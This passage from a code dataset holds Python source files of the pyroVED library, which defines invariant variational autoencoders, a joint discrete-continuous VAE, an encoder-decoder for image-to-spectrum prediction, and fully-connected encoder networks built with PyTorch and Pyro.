"permissive", "max_line_length": 78, "num_lines": 186, "path": "/pyroved/models/base.py", "repo_name": "matthewcarbone/pyroVED", "src_encoding": "UTF-8", "text": "\"\"\"\nbase.py\n=========\n\nVariational encoder-decoder base class\n\nCreated by Maxim Ziatdinov (email: [email protected])\n\"\"\"\n\nfrom typing import Tuple, Type, Union, List\nfrom abc import abstractmethod\n\nimport torch\nimport torch.nn as nn\n\nfrom ..utils import 
init_dataloader, transform_coordinates, generate_grid\n\ntt = torch.tensor\n\n\nclass baseVAE(nn.Module):\n \"\"\"Base class for regular and invriant variational encoder-decoder models.\n\n Args:\n data_dim:\n Dimensionality of the input data; use (height x width) for images\n or (length,) for spectra.\n invariances:\n List with invariances to enforce. For 2D systems, `r` enforces\n rotational invariance, `t` enforces invariance to\n translations, `sc` enforces a scale invariance, and\n invariances=None corresponds to vanilla VAE.\n For 1D systems, 't' enforces translational invariance and\n invariances=None is vanilla VAE\n\n Keyword Args:\n device:\n Sets device to which model and data will be moved.\n Defaults to 'cuda:0' if a GPU is available and to CPU otherwise.\n dx_prior:\n Translational prior in x direction (float between 0 and 1)\n dy_prior:\n Translational prior in y direction (float between 0 and 1)\n sc_prior:\n Scale prior (usually, sc_prior << 1)\n \"\"\"\n def __init__(self, *args, **kwargs: str):\n super(baseVAE, self).__init__()\n data_dim, invariances = args\n # Set device\n self.device = kwargs.get(\n \"device\", 'cuda' if torch.cuda.is_available() else 'cpu')\n # Set dimensionality\n self.ndim = len(data_dim)\n # Set invariances to enforce (number and type)\n if invariances is None:\n coord = 0\n else:\n coord = len(invariances)\n if self.ndim == 1:\n if coord > 1 or invariances[0] != 't':\n raise ValueError(\n \"For 1D data, the only invariance to enforce \"\n \"is translation ('t')\")\n if 't' in invariances and self.ndim == 2:\n coord = coord + 1\n self.coord = coord\n self.invariances = invariances\n # Set coordiante grid\n if self.coord > 0:\n self.grid = generate_grid(data_dim).to(self.device)\n # Prior \"belief\" about the degree of translational disorder\n if self.coord > 0 and 't' in self.invariances:\n dx_pri = tt(kwargs.get(\"dx_prior\", 0.1))\n dy_pri = kwargs.get(\"dy_prior\", dx_pri.clone())\n self.t_prior = (tt([dx_pri, dy_pri]) 
if self.ndim == 2\n else dx_pri).to(self.device)\n # Prior \"belief\" about the degree of scale disorder\n if self.coord > 0 and 's' in self.invariances:\n self.sc_prior = tt(kwargs.get(\"sc_prior\", 0.1)).to(self.device)\n # Encoder and decoder (None by default)\n self.encoder_z = None\n self.decoder = None\n\n @abstractmethod\n def model(self, *args, **kwargs):\n \"\"\"Pyro's model\"\"\"\n\n raise NotImplementedError\n\n @abstractmethod\n def guide(self, *args, **kwargs):\n \"\"\"Pyro's guide\"\"\"\n\n raise NotImplementedError\n\n def _split_latent(self, z: torch.Tensor) -> Tuple[torch.Tensor]:\n \"\"\"\n Split latent vector into parts associated with\n coordinate transformations and image content\n \"\"\"\n # For 1D, there is only a translation\n if self.ndim == 1:\n dx = z[:, 0:1]\n z = z[:, 1:]\n return None, dx, None, z\n phi = tt(0).to(self.device)\n dx = tt(0).to(self.device)\n sc = tt(1).to(self.device)\n if 'r' in self.invariances:\n phi = z[:, 0]\n z = z[:, 1:]\n if 't' in self.invariances:\n dx = z[:, :2]\n z = z[:, 2:]\n if 's' in self.invariances:\n sc = sc + self.sc_prior * z[:, 0]\n z = z[:, 1:]\n return phi, dx, sc, z\n\n def _encode(\n self,\n *input_args: Tuple[Union[torch.Tensor, List[torch.Tensor]]],\n **kwargs: int\n ) -> torch.Tensor:\n \"\"\"Encodes data using a trained inference (encoder) network\n in a batch-by-batch fashion.\"\"\"\n\n def inference(x: Tuple[torch.Tensor]) -> torch.Tensor:\n x = torch.cat(x, -1).to(self.device)\n with torch.no_grad():\n encoded = self.encoder_z(x)\n encoded = torch.cat(encoded, -1).cpu()\n return encoded\n\n loader = init_dataloader(*input_args, shuffle=False, **kwargs)\n z_encoded = []\n for x in loader:\n z_encoded.append(inference(x))\n return torch.cat(z_encoded)\n\n def _decode(self, z_new: torch.Tensor, **kwargs: int) -> torch.Tensor:\n \"\"\"Decodes latent coordinates in a batch-by-batch fashion.\"\"\"\n\n def generator(z: List[torch.Tensor]) -> torch.Tensor:\n with torch.no_grad():\n loc = 
self.decoder(*z)\n return loc.cpu()\n\n z_new = init_dataloader(z_new, shuffle=False, **kwargs)\n if self.invariances:\n grid = self.grid\n a = kwargs.get(\"angle\", tt(0.)).to(self.device)\n t = kwargs.get(\"shift\", tt(0.)).to(self.device)\n s = kwargs.get(\"scale\", tt(1.)).to(self.device)\n grid = transform_coordinates(\n grid.unsqueeze(0), a.unsqueeze(0),\n t.unsqueeze(0), s.unsqueeze(0))\n grid = grid.squeeze()\n x_decoded = []\n for z in z_new:\n if self.invariances:\n z = [grid.expand(z[0].shape[0], *grid.shape)] + z\n x_decoded.append(generator(z))\n return torch.cat(x_decoded)\n\n def set_encoder(self, encoder_net: Type[torch.nn.Module]) -> None:\n \"\"\"Sets a user-defined encoder neural network.\"\"\"\n\n self.encoder_z = encoder_net.to(self.device)\n\n def set_decoder(self, decoder_net: Type[torch.nn.Module]) -> None:\n \"\"\"Sets a user-defined decoder neural network.\"\"\"\n\n self.decoder = decoder_net.to(self.device)\n\n def save_weights(self, filepath: str) -> None:\n \"\"\"Saves trained weights of encoder(s) and decoder.\"\"\"\n\n torch.save(self.state_dict(), filepath + '.pt')\n\n def load_weights(self, filepath: str) -> None:\n \"\"\"Loads saved weights of encoder(s) and decoder.\"\"\"\n\n weights = torch.load(filepath, map_location=self.device)\n self.load_state_dict(weights)\n" }, { "alpha_fraction": 0.5626335144042969, "alphanum_fraction": 0.5684314966201782, "avg_line_length": 41.012821197509766, "blob_id": "f82d3a145eec617b1bd00c8a82b30fb39f1d4a42", "content_id": "b26df2aea0fb47e40877556d6b7c8394403630c1", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 13108, "license_type": "permissive", "max_line_length": 94, "num_lines": 312, "path": "/pyroved/models/jivae.py", "repo_name": "matthewcarbone/pyroVED", "src_encoding": "UTF-8", "text": "\"\"\"\njivae.py\n=========\n\nVariational autoencoder for learning (jointly) discrete and\ncontinuous latent representations of data with 
arbitrary affine transformations\n(rotations, translations, and scale)\n\nCreated by Maxim Ziatdinov (email: [email protected])\n\"\"\"\nfrom typing import Tuple, Union, List\n\nimport pyro\nimport pyro.distributions as dist\nimport torch\n\nfrom ..nets import fcDecoderNet, jfcEncoderNet, sDecoderNet\nfrom ..utils import (generate_grid, generate_latent_grid,\n generate_latent_grid_traversal, get_sampler,\n plot_grid_traversal, plot_img_grid, plot_spect_grid,\n set_deterministic_mode, to_onehot, transform_coordinates)\nfrom .base import baseVAE\n\ntt = torch.tensor\n\n\nclass jiVAE(baseVAE):\n \"\"\"\n Variational autoencoder for learning (jointly) discrete and\n continuous latent representations of data while enforcing rotational,\n translational, and scale invariances.\n\n Args:\n data_dim:\n Dimensionality of the input data; (h x w) for images\n or (length,) for spectra.\n latent_dim:\n Number of continuous latent dimensions.\n discrete_dim:\n Number of discrete latent dimensions.\n invariances:\n List with invariances to enforce. 
For 2D systems, `r` enforces\n rotational invariance, `t` enforces invariance to\n translations, `sc` enforces a scale invariance, and\n invariances=None corresponds to vanilla VAE.\n For 1D systems, 't' enforces translational invariance and\n invariances=None is vanilla VAE\n hidden_dim_e:\n Number of hidden units per each layer in encoder (inference network).\n hidden_dim_d:\n Number of hidden units per each layer in decoder (generator network).\n num_layers_e:\n Number of layers in encoder (inference network).\n num_layers_d:\n Number of layers in decoder (generator network).\n activation:\n Non-linear activation for inner layers of encoder and decoder.\n The available activations are ReLU ('relu'), leaky ReLU ('lrelu'),\n hyberbolic tangent ('tanh'), softplus ('softplus'), and GELU ('gelu').\n (The default is 'tanh').\n sampler_d:\n Decoder sampler, as defined as p(x|z) = sampler(decoder(z)).\n The available samplers are 'bernoulli', 'continuous_bernoulli',\n and 'gaussian' (Default: 'bernoulli').\n sigmoid_d:\n Sigmoid activation for the decoder output (Default: True).\n seed:\n Seed used in torch.manual_seed(seed) and\n torch.cuda.manual_seed_all(seed).\n\n Keyword Args:\n device:\n Sets device to which model and data will be moved.\n Defaults to 'cuda:0' if a GPU is available and to CPU otherwise.\n dx_prior:\n Translational prior in x direction (float between 0 and 1)\n dy_prior:\n Translational prior in y direction (float between 0 and 1)\n sc_prior:\n Scale prior (usually, sc_prior << 1)\n decoder_sig:\n Sets sigma for a \"gaussian\" decoder sampler\n\n Examples:\n\n Initialize a joint VAE model with rotational invariance for 10 discrete classes\n\n >>> data_dim = (28, 28)\n >>> jrvae = jiVAE(data_dim, latent_dim=2, discrete_dim=10, invariances=['r'])\n \"\"\"\n\n def __init__(self,\n data_dim: Tuple[int],\n latent_dim: int,\n discrete_dim: int,\n invariances: List[str] = None,\n hidden_dim_e: int = 128,\n hidden_dim_d: int = 128,\n num_layers_e: int = 
2,\n num_layers_d: int = 2,\n activation: str = \"tanh\",\n sampler_d: str = \"bernoulli\",\n sigmoid_d: bool = True,\n seed: int = 1,\n **kwargs: Union[str, float]\n ) -> None:\n \"\"\"\n Initializes j-iVAE's modules and parameters\n \"\"\"\n args = (data_dim, invariances)\n super(jiVAE, self).__init__(*args, **kwargs)\n pyro.clear_param_store()\n set_deterministic_mode(seed)\n self.data_dim = data_dim\n\n # Initialize the Encoder NN\n self.encoder_z = jfcEncoderNet(\n data_dim, latent_dim+self.coord, discrete_dim, hidden_dim_e,\n num_layers_e, activation, softplus_out=True)\n\n # Initialize the Decoder NN\n dnet = sDecoderNet if 0 < self.coord < 5 else fcDecoderNet\n self.decoder = dnet(\n data_dim, latent_dim, discrete_dim, hidden_dim_d,\n num_layers_d, activation, sigmoid_out=sigmoid_d, unflat=False)\n\n # Initialize the decoder's sampler\n self.sampler_d = get_sampler(sampler_d, **kwargs)\n\n # Set continuous and discrete dimensions\n self.z_dim = latent_dim + self.coord\n self.discrete_dim = discrete_dim\n\n # Move model parameters to appropriate device\n self.to(self.device)\n\n def model(self,\n x: torch.Tensor,\n **kwargs: float) -> None:\n \"\"\"\n Defines the model p(x|z,c)p(z)p(c)\n \"\"\"\n # register PyTorch module `decoder` with Pyro\n pyro.module(\"decoder\", self.decoder)\n # KLD scale factor (see e.g. 
https://openreview.net/pdf?id=Sy2fzU9gl)\n beta = kwargs.get(\"scale_factor\", [1., 1.])\n if isinstance(beta, (float, int, list)):\n beta = torch.tensor(beta)\n if beta.ndim == 0:\n beta = torch.tensor([beta, beta])\n reshape_ = torch.prod(tt(x.shape[1:])).item()\n bdim = x.shape[0]\n with pyro.plate(\"data\"):\n # sample the continuous latent vector from the constant prior distribution\n z_loc = x.new_zeros(torch.Size((bdim, self.z_dim)))\n z_scale = x.new_ones(torch.Size((bdim, self.z_dim)))\n # sample discrete latent vector from the constant prior\n alpha = x.new_ones(torch.Size((bdim, self.discrete_dim))) / self.discrete_dim\n # sample from prior (value will be sampled by guide when computing ELBO)\n with pyro.poutine.scale(scale=beta[0]):\n z = pyro.sample(\"latent_cont\", dist.Normal(z_loc, z_scale).to_event(1))\n with pyro.poutine.scale(scale=beta[1]):\n z_disc = pyro.sample(\"latent_disc\", dist.OneHotCategorical(alpha))\n # split latent variable into parts for rotation and/or translation\n # and image content\n if self.coord > 0:\n phi, dx, sc, z = self.split_latent(z.repeat(self.discrete_dim, 1))\n if 't' in self.invariances:\n dx = (dx * self.t_prior).unsqueeze(1)\n # transform coordinate grid\n grid = self.grid.expand(bdim*self.discrete_dim, *self.grid.shape)\n x_coord_prime = transform_coordinates(grid, phi, dx, sc)\n # Continuous and discrete latent variables for the decoder\n z = [z, z_disc.reshape(-1, self.discrete_dim) if self.coord > 0 else z_disc]\n # decode the latent code z together with the transformed coordinates (if any)\n dec_args = (x_coord_prime, z) if self.coord else (z,)\n loc = self.decoder(*dec_args)\n # score against actual images/spectra\n loc = loc.view(*z_disc.shape[:-1], reshape_)\n pyro.sample(\n \"obs\", self.sampler_d(loc).to_event(1),\n obs=x.view(-1, reshape_))\n\n def guide(self,\n x: torch.Tensor,\n **kwargs: float) -> None:\n \"\"\"\n Defines the guide q(z,c|x)\n \"\"\"\n # register PyTorch module `encoder_z` with Pyro\n 
pyro.module(\"encoder_z\", self.encoder_z)\n # KLD scale factor (see e.g. https://openreview.net/pdf?id=Sy2fzU9gl)\n beta = kwargs.get(\"scale_factor\", [1., 1.])\n if isinstance(beta, (float, int, list)):\n beta = torch.tensor(beta)\n if beta.ndim == 0:\n beta = torch.tensor([beta, beta])\n with pyro.plate(\"data\"):\n # use the encoder to get the parameters used to define q(z,c|x)\n z_loc, z_scale, alpha = self.encoder_z(x)\n # sample the latent code z\n with pyro.poutine.scale(scale=beta[0]):\n pyro.sample(\"latent_cont\", dist.Normal(z_loc, z_scale).to_event(1))\n with pyro.poutine.scale(scale=beta[1]):\n pyro.sample(\"latent_disc\", dist.OneHotCategorical(alpha))\n\n def split_latent(self, z: torch.Tensor) -> Tuple[torch.Tensor]:\n \"\"\"\n Split latent variable into parts with rotation and/or translation\n and image content\n \"\"\"\n return self._split_latent(z)\n\n def encode(self,\n x_new: torch.Tensor,\n logits: bool = False,\n **kwargs: int) -> torch.Tensor:\n \"\"\"\n Encodes data using a trained inference (encoder) network\n\n Args:\n x_new:\n Data to encode with a trained j-iVAE. 
The new data must have\n the same dimensions (images height and width or spectra length)\n as the one used for training.\n logits:\n Return raw class probabilities (Default: False).\n kwargs:\n Batch size as 'batch_size' (for encoding large volumes of data).\n \"\"\"\n z = self._encode(x_new)\n z_loc = z[:, :self.z_dim]\n z_scale = z[:, self.z_dim:2*self.z_dim]\n classes = z[:, 2*self.z_dim:]\n if not logits:\n _, classes = torch.max(classes, 1)\n return z_loc, z_scale, classes\n\n def decode(self, z: torch.Tensor, y: torch.Tensor, **kwargs: int) -> torch.Tensor:\n \"\"\"\n Decodes a batch of latent coordinates\n\n Args:\n z: Latent coordinates (without rotational and translational parts)\n y: Classes as one-hot vectors for each sample in z\n \"\"\"\n z = torch.cat([z.to(self.device), y.to(self.device)], -1)\n loc = self._decode(z, **kwargs)\n return loc.view(-1, *self.data_dim)\n\n def manifold2d(self, d: int, disc_idx: int = 0, plot: bool = True,\n **kwargs: Union[str, int, float]) -> torch.Tensor:\n \"\"\"\n Plots a learned latent manifold in the data space\n\n Args:\n d: Grid size\n disc_idx: Discrete dimension for which we plot continuous latent manifolds\n plot: Plots the generated manifold (Default: True)\n kwargs: Keyword arguments include custom min/max values for grid\n boundaries passed as 'z_coord' (e.g. 
z_coord = [-3, 3, -3, 3]),\n 'angle' and 'shift' to condition a generative model on,\n and plot parameters ('padding', 'padding_value', 'cmap', 'origin', 'ylim')\n \"\"\"\n z, (grid_x, grid_y) = generate_latent_grid(d, **kwargs)\n z_disc = to_onehot(tt(disc_idx).unsqueeze(0), self.discrete_dim)\n z_disc = z_disc.repeat(z.shape[0], 1)\n loc = self.decode(z, z_disc, **kwargs)\n if plot:\n if self.ndim == 2:\n plot_img_grid(\n loc, d,\n extent=[grid_x.min(), grid_x.max(), grid_y.min(), grid_y.max()],\n **kwargs)\n elif self.ndim == 1:\n plot_spect_grid(loc, d, **kwargs)\n return loc\n\n def manifold_traversal(self, d: int, cont_idx: int, cont_idx_fixed: int = 0,\n plot: bool = True, **kwargs: Union[str, int, float]\n ) -> torch.Tensor:\n \"\"\"\n Latent space traversal for joint continuous and discrete\n latent representations\n\n Args:\n d: Grid size\n cont_idx:\n Continuous latent variable used for plotting\n a latent manifold traversal\n cont_idx_fixed:\n Value which the remaining continuous latent variables are fixed at\n plot:\n Plots the generated manifold (Default: True)\n kwargs:\n Keyword arguments include custom min/max values for grid\n boundaries passed as 'z_coord' (e.g. 
z_coord = [-3, 3, -3, 3]),\n 'angle' and 'shift' to condition a generative model one,\n and plot parameters ('padding', 'padding_value', 'cmap', 'origin', 'ylim')\n \"\"\"\n num_samples = d**2\n disc_dim = self.discrete_dim\n cont_dim = self.z_dim - self.coord\n data_dim = self.data_dim\n # Get continuous and discrete latent coordinates\n samples_cont, samples_disc = generate_latent_grid_traversal(\n d, cont_dim, disc_dim, cont_idx, cont_idx_fixed, num_samples)\n # Pass discrete and continuous latent coordinates through a decoder\n decoded = self.decode(samples_cont, samples_disc, **kwargs)\n if plot:\n plot_grid_traversal(decoded, d, data_dim, disc_dim, **kwargs)\n return decoded\n" }, { "alpha_fraction": 0.5421316623687744, "alphanum_fraction": 0.5489915013313293, "avg_line_length": 39.028690338134766, "blob_id": "7cf51c76ce37cecbd6259a5234066d451ca77083", "content_id": "e7f135b7d20c9f85efdba15cd5ae13fd80c204f9", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9767, "license_type": "permissive", "max_line_length": 94, "num_lines": 244, "path": "/pyroved/models/ved.py", "repo_name": "matthewcarbone/pyroVED", "src_encoding": "UTF-8", "text": "\"\"\"\nved.py\n=========\n\nVariational encoder-decoder model (input and output are different)\n\nCreated by Maxim Ziatdinov (email: [email protected])\n\"\"\"\nfrom typing import Tuple, Union, List\n\nimport pyro\nimport pyro.distributions as dist\nimport torch\n\nfrom .base import baseVAE\nfrom ..nets import convEncoderNet, convDecoderNet\nfrom ..utils import (generate_latent_grid, get_sampler,\n init_dataloader, plot_img_grid, plot_spect_grid,\n set_deterministic_mode)\n\n\nclass VED(baseVAE):\n \"\"\"\n Variational encoder-decoder model where the inputs and outputs are not identical.\n This model can be used for realizing im2spec and spec2im type of models where\n 1D spectra are predicted from image data and vice versa.\n\n Args:\n input_dim:\n 
Dimensionality of the input data; use (h x w) for images\n or (length,) for spectra.\n output_dim:\n Dimensionality of the input data; use (h x w) for images\n or (length,) for spectra. Doesn't have to match the input data.\n input_channels:\n Number of input channels (Default: 1)\n output_channels:\n Number of output channels (Default: 1)\n latent_dim:\n Number of latent dimensions.\n hidden_dim_e:\n Number of hidden units (convolutional filters) for each layer in\n the first block of the encoder NN. The number of units in the\n consecutive blocks is defined as hidden_dim_e * n,\n where n = 2, 3, ..., n_blocks (Default: 32).\n hidden_dim_d:\n Number of hidden units (convolutional filters) for each layer in\n the first block of the decoder NN. The number of units in the\n consecutive blocks is defined as hidden_dim_e // n,\n where n = 2, 3, ..., n_blocks (Default: 96).\n num_layers_e:\n List with numbers of layers per each block of the encoder NN.\n Defaults to [1, 2, 2] if none is specified.\n num_layers_d:\n List with numbers of layers per each block of the decoder NN.\n Defaults to [2, 2, 1] if none is specified.\n activation:\n activation:\n Non-linear activation for inner layers of encoder and decoder.\n The available activations are ReLU ('relu'), leaky ReLU ('lrelu'),\n hyberbolic tangent ('tanh'), softplus ('softplus'), and GELU ('gelu').\n (The default is 'lrelu').\n batchnorm:\n Batch normalization attached to each convolutional layer\n after non-linear activation (except for layers with 1x1 filters)\n in the encoder and decoder NNs (Default: False)\n sampler_d:\n Decoder sampler, as defined as p(x|z) = sampler(decoder(z)).\n The available samplers are 'bernoulli', 'continuous_bernoulli',\n and 'gaussian' (Default: 'bernoulli').\n sigmoid_d:\n Sigmoid activation for the decoder output (Default: True)\n seed:\n Seed used in torch.manual_seed(seed) and\n torch.cuda.manual_seed_all(seed)\n kwargs:\n Additional keyword argument is *decoder_sig* for setting 
sigma\n in the decoder's sampler when it is chosen to be a \"gaussian\".\n\n Examples:\n\n Initialize a VED model for predicting 1D spectra from 2D images\n\n >>> input_dim = (32, 32) # image height and width\n >>> output_dim = (16,) # spectrum length\n >>> ved = VED(input_dim, output_dim, latent_dim=2)\n \"\"\"\n def __init__(self,\n input_dim: Tuple[int],\n output_dim: Tuple[int],\n input_channels: int = 1,\n output_channels: int = 1,\n latent_dim: int = 2,\n hidden_dim_e: int = 32,\n hidden_dim_d: int = 96,\n num_layers_e: List[int] = None,\n num_layers_d: List[int] = None,\n activation: str = \"lrelu\",\n batchnorm: bool = False,\n sampler_d: str = \"bernoulli\",\n sigmoid_d: bool = True,\n seed: int = 1,\n **kwargs: float\n ) -> None:\n \"\"\"\n Initializes VED's modules and parameters\n \"\"\"\n super(VED, self).__init__(output_dim, None, **kwargs)\n pyro.clear_param_store()\n set_deterministic_mode(seed)\n self.device = 'cuda' if torch.cuda.is_available() else 'cpu'\n self.ndim = len(output_dim)\n self.encoder_z = convEncoderNet(\n input_dim, input_channels, latent_dim,\n num_layers_e, hidden_dim_e,\n batchnorm, activation)\n self.decoder = convDecoderNet(\n latent_dim, output_dim, output_channels,\n num_layers_d, hidden_dim_d,\n batchnorm, activation, sigmoid_d)\n self.sampler_d = get_sampler(sampler_d, **kwargs)\n self.z_dim = latent_dim\n self.to(self.device)\n\n def model(self,\n x: torch.Tensor = None,\n y: torch.Tensor = None,\n **kwargs: float) -> None:\n \"\"\"\n Defines the model p(y|z)p(z)\n \"\"\"\n # register PyTorch module `decoder` with Pyro\n pyro.module(\"decoder\", self.decoder)\n # KLD scale factor (see e.g. 
https://openreview.net/pdf?id=Sy2fzU9gl)\n beta = kwargs.get(\"scale_factor\", 1.)\n with pyro.plate(\"data\", x.shape[0]):\n # setup hyperparameters for prior p(z)\n z_loc = x.new_zeros(torch.Size((x.shape[0], self.z_dim)))\n z_scale = x.new_ones(torch.Size((x.shape[0], self.z_dim)))\n # sample from prior (value will be sampled by guide when computing the ELBO)\n with pyro.poutine.scale(scale=beta):\n z = pyro.sample(\"z\", dist.Normal(z_loc, z_scale).to_event(1))\n # decode the latent code z\n loc = self.decoder(z)\n # score against actual images\n pyro.sample(\n \"obs\", self.sampler_d(loc.flatten(1)).to_event(1),\n obs=y.flatten(1))\n\n def guide(self,\n x: torch.Tensor = None,\n y: torch.Tensor = None,\n **kwargs: float) -> None:\n \"\"\"\n Defines the guide q(z|x)\n \"\"\"\n # register PyTorch module `encoder_z` with Pyro\n pyro.module(\"encoder_z\", self.encoder_z)\n # KLD scale factor (see e.g. https://openreview.net/pdf?id=Sy2fzU9gl)\n beta = kwargs.get(\"scale_factor\", 1.)\n with pyro.plate(\"data\", x.shape[0]):\n # use the encoder to get the parameters used to define q(z|x)\n z_loc, z_scale = self.encoder_z(x)\n # sample the latent code z\n with pyro.poutine.scale(scale=beta):\n pyro.sample(\"z\", dist.Normal(z_loc, z_scale).to_event(1))\n\n def encode(self, x_new: torch.Tensor, **kwargs: int) -> torch.Tensor:\n \"\"\"\n Encodes data using a trained inference (encoder) network\n\n Args:\n x_new:\n Data to encode with a trained trVAE. 
The new data must have\n the same dimensions (images height and width or spectra length)\n as the one used for training.\n kwargs:\n Batch size as 'batch_size' (for encoding large volumes of data)\n \"\"\"\n self.eval()\n z = self._encode(x_new)\n z_loc, z_scale = z.split(self.z_dim, 1)\n return z_loc, z_scale\n\n def decode(self,\n z: torch.Tensor,\n **kwargs: int) -> torch.Tensor:\n \"\"\"\n Decodes a batch of latent coordnates\n\n Args:\n z: Latent coordinates\n \"\"\"\n self.eval()\n z = z.to(self.device)\n loc = self._decode(z, **kwargs)\n return loc\n\n def predict(self, x_new: torch.Tensor, **kwargs: int) -> torch.Tensor:\n \"\"\"Forward prediction (encode -> sample -> decode)\"\"\"\n\n def forward_(x_i) -> torch.Tensor:\n with torch.no_grad():\n encoded = self.encoder_z(x_i)\n encoded = torch.cat(encoded, -1)\n z_mu, z_sig = encoded.split(self.z_dim, 1)\n z_samples = dist.Normal(z_mu, z_sig).rsample(sample_shape=(30,))\n y = torch.cat([self.decoder(z)[None] for z in z_samples])\n return y.mean(0).cpu(), y.std(0).cpu()\n\n x_new = init_dataloader(x_new, shuffle=False, **kwargs)\n prediction_mu, prediction_sd = [], []\n for (x_i,) in x_new:\n y_mu, y_sd = forward_(x_i.to(self.device))\n prediction_mu.append(y_mu)\n prediction_sd.append(y_sd)\n return torch.cat(prediction_mu), torch.cat(prediction_sd)\n\n def manifold2d(self, d: int, plot: bool = True,\n **kwargs: Union[str, int]) -> torch.Tensor:\n \"\"\"\n Plots a learned latent manifold in the image space\n\n Args:\n d: Grid size\n plot: Plots the generated manifold (Default: True)\n kwargs: Keyword arguments include custom min/max values for grid\n boundaries passed as 'z_coord' (e.g. 
z_coord = [-3, 3, -3, 3])\n and plot parameters ('padding', 'padding_value', 'cmap', 'origin', 'ylim')\n \"\"\"\n self.eval()\n z, (grid_x, grid_y) = generate_latent_grid(d, **kwargs)\n z = z.to(self.device)\n with torch.no_grad():\n loc = self.decoder(z).cpu()\n if plot:\n if self.ndim == 2:\n plot_img_grid(\n loc, d,\n extent=[grid_x.min(), grid_x.max(), grid_y.min(), grid_y.max()],\n **kwargs)\n elif self.ndim == 1:\n plot_spect_grid(loc, d, **kwargs)\n return loc\n" }, { "alpha_fraction": 0.7001827955245972, "alphanum_fraction": 0.7001827955245972, "avg_line_length": 48.727272033691406, "blob_id": "b7d3f60035e4c0e097764f242d84b1eaf3e83b0f", "content_id": "51449170806ab1e7298553d83c94e8fe46358a20", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 547, "license_type": "permissive", "max_line_length": 79, "num_lines": 11, "path": "/pyroved/nets/__init__.py", "repo_name": "matthewcarbone/pyroVED", "src_encoding": "UTF-8", "text": "\"\"\"\nFully-connected and convolutional neural network modules\n\"\"\"\nfrom .conv import (ConvBlock, FeatureExtractor, UpsampleBlock, Upsampler,\n convDecoderNet, convEncoderNet)\nfrom .fc import (fcClassifierNet, fcDecoderNet, fcEncoderNet, jfcEncoderNet,\n sDecoderNet, fcRegressorNet)\n\n__all__ = [\"fcEncoderNet\", \"fcDecoderNet\", \"sDecoderNet\", \"fcRegressorNet\",\n \"fcClassifierNet\", \"jfcEncoderNet\", \"ConvBlock\", \"UpsampleBlock\",\n \"FeatureExtractor\", \"Upsampler\", \"convEncoderNet\", \"convDecoderNet\"]\n" }, { "alpha_fraction": 0.5034521222114563, "alphanum_fraction": 0.513155460357666, "avg_line_length": 30.804153442382812, "blob_id": "5f1042edf3ef001421f051cee72746dc9506eb57", "content_id": "4c155554326d0b2dade64d40e042df723739b5d1", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10718, "license_type": "permissive", "max_line_length": 90, "num_lines": 337, "path": 
"/pyroved/nets/fc.py", "repo_name": "matthewcarbone/pyroVED", "src_encoding": "UTF-8", "text": "\"\"\"\nfc.py\n\nModule for creating fully-connected encoder and decoder modules\n\nCreated by Maxim Ziatdinov ([email protected])\n\"\"\"\n\nfrom typing import List, Tuple, Type, Union\n\nimport torch\nimport torch.nn as nn\nfrom pyro.distributions.util import broadcast_shape\n\nfrom ..utils import get_activation\n\ntt = torch.tensor\n\n\nclass Concat(nn.Module):\n \"\"\"\n Module for concatenation of tensors\n \"\"\"\n def __init__(self, allow_broadcast: bool = True):\n \"\"\"\n Initializes module\n \"\"\"\n self.allow_broadcast = allow_broadcast\n super().__init__()\n\n def forward(self, input_args: Union[List[torch.Tensor], torch.Tensor]\n ) -> torch.Tensor:\n \"\"\"\n Performs concatenation\n \"\"\"\n if torch.is_tensor(input_args):\n return input_args\n if self.allow_broadcast:\n shape = broadcast_shape(*[s.shape[:-1] for s in input_args]) + (-1,)\n input_args = [s.expand(shape) for s in input_args]\n out = torch.cat(input_args, dim=-1)\n return out\n\n\nclass fcEncoderNet(nn.Module):\n \"\"\"\n Standard fully-connected encoder NN for VAE.\n The encoder outputs mean and standard evidation of the encoded distribution.\n \"\"\"\n def __init__(self,\n in_dim: Tuple[int],\n latent_dim: int = 2,\n c_dim: int = 0,\n hidden_dim: int = 128,\n num_layers: int = 2,\n activation: str = 'tanh',\n softplus_out: bool = True,\n flat: bool = True\n ) -> None:\n \"\"\"\n Initializes module\n \"\"\"\n super(fcEncoderNet, self).__init__()\n if len(in_dim) not in [1, 2, 3]:\n raise ValueError(\"in_dim must be (h, w), (h, w, c), or (l,)\")\n self.in_dim = torch.prod(tt(in_dim)).item() + c_dim\n self.flat = flat\n\n self.concat = Concat()\n self.fc_layers = make_fc_layers(\n self.in_dim, hidden_dim, num_layers, activation)\n self.fc11 = nn.Linear(hidden_dim, latent_dim)\n self.fc12 = nn.Linear(hidden_dim, latent_dim)\n self.activation_out = nn.Softplus() if softplus_out else lambda x: 
x\n\n def forward(self, x: torch.Tensor) -> Tuple[torch.Tensor]:\n \"\"\"\n Forward pass\n \"\"\"\n x = self.concat(x)\n if self.flat:\n x = x.view(-1, self.in_dim)\n x = self.fc_layers(x)\n mu = self.fc11(x)\n sigma = self.activation_out(self.fc12(x))\n return mu, sigma\n\n\nclass jfcEncoderNet(nn.Module):\n \"\"\"\n Fully-connected encoder for joint VAE.\n The encoder outputs mean, standard evidation and class probabilities.\n \"\"\"\n def __init__(self,\n in_dim: Tuple[int],\n latent_dim: int = 2,\n discrete_dim: int = 0,\n hidden_dim: int = 128,\n num_layers: int = 2,\n activation: str = 'tanh',\n softplus_out: bool = True,\n flat: bool = True\n ) -> None:\n \"\"\"\n Initializes module\n \"\"\"\n super(jfcEncoderNet, self).__init__()\n if len(in_dim) not in [1, 2, 3]:\n raise ValueError(\"in_dim must be (h, w), (h, w, c), or (l,)\")\n self.in_dim = torch.prod(tt(in_dim)).item()\n self.flat = flat\n\n self.concat = Concat()\n self.fc_layers = make_fc_layers(\n self.in_dim, hidden_dim, num_layers, activation)\n self.fc11 = nn.Linear(hidden_dim, latent_dim)\n self.fc12 = nn.Linear(hidden_dim, latent_dim)\n self.fc13 = nn.Linear(hidden_dim, discrete_dim)\n self.activation_out = nn.Softplus() if softplus_out else lambda x: x\n\n def forward(self, x: torch.Tensor) -> Tuple[torch.Tensor]:\n \"\"\"\n Forward pass\n \"\"\"\n x = self.concat(x)\n if self.flat:\n x = x.view(-1, self.in_dim)\n x = self.fc_layers(x)\n mu = self.fc11(x)\n sigma = 